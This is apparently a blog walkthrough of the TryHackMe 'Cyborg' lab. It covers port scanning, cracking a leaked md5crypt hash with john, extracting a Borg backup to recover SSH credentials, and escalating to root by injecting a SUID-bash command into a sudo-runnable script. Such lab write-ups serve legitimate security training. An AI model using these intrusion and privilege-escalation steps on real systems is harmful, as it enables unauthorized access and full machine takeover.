Open in app

Sign in

Write

Sign in

TryHackMe-Room: Cyborg

Mondenovice
7 min readFeb 9, 2024

--

Cyborg

🔰Information of this box : A box involving encrypted archives, source code analysis and more.

🔰Step1: Scanning

After my nmap scan, i have this results:

nmap -Pn -A 10.10.176.158 -vvv
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0gr
cKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2u
iRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQP
bxUF6eH2QZb20=
|   256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two ports open: 22 for SSH service and 80 for HTTP service !

For ssh the version is not vulnerable, at least for the moment!

🔰STEP 2 : Enumeration

Now navigate to HTTP port:

The default Apache configuration page

Nothing interesting here! All we have is that it’s an Ubuntu machine. OK ! I also looked at the source code (Crtl+u), but I found nothing! So I did a Gobuster scan on the box and found:

Two interesting repertoires : /admin and /etc

here is the content of each:

In the /admin repertoires I found things:

We notice a file named: archive.tar!

I download It !

and a very interesting paragraph :”Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. ther than that im pretty sure my backup "music_archive" is safe just to confirm. “

it seems to speak of a certain “music_archive” !

in the /etc directory I found :

squid.conf
Password

we have a password:

music_archive:$apr1$BpZ.Q.1m$REDACTEDOVQTTn.

Let’s save it in a file “crackme.txt”

let’s use john to crack it, with the command

┌──(root㉿BOTNET)-[~/THM/Cyborg]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (music_archive)
1g 0:00:00:02 DONE (2024-02-09 20:54) 0.4739g/s 18472p/s 18472c/s 18472C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt

Ok ! whe have the password for “music_archive” !

let’s go back to the tar archive “archive.tar” that I downloaded!

I decompressed it with the command:

tar -xvf archive.tar

we have this : home/field/dev/final_archive/

We have a username: field

and we notice the file final_archive !

inside I noticed a README file!
and I opened it!

Borg is There

Its talking about some Borg backups! but if I remember correctly he also

talked about backups in the “music_archive” folder

Let’s do a little research on Borg!

What is borg ?

BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.

The main goal of Borg is to provide an efficient and secure way to backup data. The data deduplication technique used makes Borg suitable for daily backups since only changes are stored. The authenticated encryption technique makes it suitable for backups to not fully trusted targets.

First let’s install borg with:

apt install borgbackup

Next on the README is the documentation for borgbackup! I went and found:

# Extract entire archive
$ borg extract /path/to/repo::my-files

# Extract entire archive and list files while processing
$ borg extract --list /path/to/repo::my-files

# Verify whether an archive could be successfully extracted, but do not write files to disk
$ borg extract --dry-run /path/to/repo::my-files

# Extract the "src" directory
$ borg extract /path/to/repo::my-files home/USERNAME/src

# Extract the "src" directory but exclude object files
$ borg extract /path/to/repo::my-files home/USERNAME/src --exclude '*.o'

# Restore a raw device (must not be active/in use/mounted at that time)
$ borg extract --stdout /path/to/repo::my-sdx | dd of=/dev/sdx bs=10M

on the official documentation:

borg extract - Borg - Deduplicating Archiver 1.2.7 documentation

borg [common options] extract [options] ARCHIVE [PATH...] This command extracts the contents of an archive. By default…

borgbackup.readthedocs.

I use that :

borg extract /path/to/repo::my-files
borg extract home/field/dev/final_archive/::music_archive

Be sure to be in the correct directory containing the /home directory!
Then I’m prompted to enter the password and that’s it!

I go back to the /home folder and use the “tree” command:

┌──(root㉿BOTNET)-[~/THM/Cyborg/home]
└─# tree
.
|-- alex
|   |-- Desktop
|   |   `-- secret.txt
|   |-- Documents
|   |   `-- note.txt
|   |-- Downloads
|   |-- Music
|   |-- Pictures
|   |-- Public
|   |-- Templates
|   `-- Videos
`-- field
    `-- dev
        `-- final_archive
            |-- README
            |-- config
            |-- data
            |   `-- 0
            |       |-- 1
            |       |-- 3
            |       |-- 4
            |       `-- 5
            |-- hints.5
            |-- index.5
            |-- integrity.5
            `-- nonce

15 directories, 12 files

Yes I know, the suspicious things are: secret.txt and note.txt!

let’s see them:
the only interesting thing is these note.txt in: /home/alex/Documents

cat note.txt

credentials:

┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:REDACTED

We have Alex’s credentials! So the first thing that comes to mind is the SSH connection.

┌──(root㉿BOTNET)-[~/…/Cyborg/home/alex/Documents]
└─# ssh alex@10.10.176.158
The authenticity of host '10.10.176.158 (10.10.176.158)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.176.158' (ED25519) to the list of known hosts.
alex@10.10.176.158's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$

😀😀😀 I’m logged in as Alex:

and can read the user.txt

cat user.txt

🔰STEP3: PRIVILEGE ESCALATION:

then the privesc:
This is what we present:

sudo -l

You can run this script as anyone without a password! Isn’t that great 😀!

Now let’s see our permissions to the file:

We see that user alex is the owner of the file! So we can modify the script a note porter:
Instead of a reverse shell we’re going to do something else today😎:
I will add this code into the script:
Since the script will be executed as root; root will execute the code, So give its SUID to the /bin/bash file! But SUID confers the power to use a file as a user without being one!

cp /bin/bash ./ && chmod +s bash

Then we change the permissions to the script:

chmod 700 /etc/mp3backups/backup.sh

and run the script with sudo:

sudo /etc/mp3backups/backup.sh

We don’t notice anything:

But just do :

ls -la

We notice a bash file with the SUID root 😀!
So if I run the command:

./bash -p

I’m still alex but with the egid and euid of root:
So I could use all the commands as root, but to have a prettier shell (which many people don’t do afterwards)! If python is installed on the machine, you can do:

bash-4.3# python
Python 2.7.12 (default, Oct  5 2020, 13:56:01)
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system("/bin/bash -p")
root@ubuntu:~#

These prettier as well !

finally we can read the “root.txt” file

cat root.txt

🔰🔰🔰Thank you for READING 😀😀😀😀😀😀

--

--

Mondenovice

Written by Mondenovice

3 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams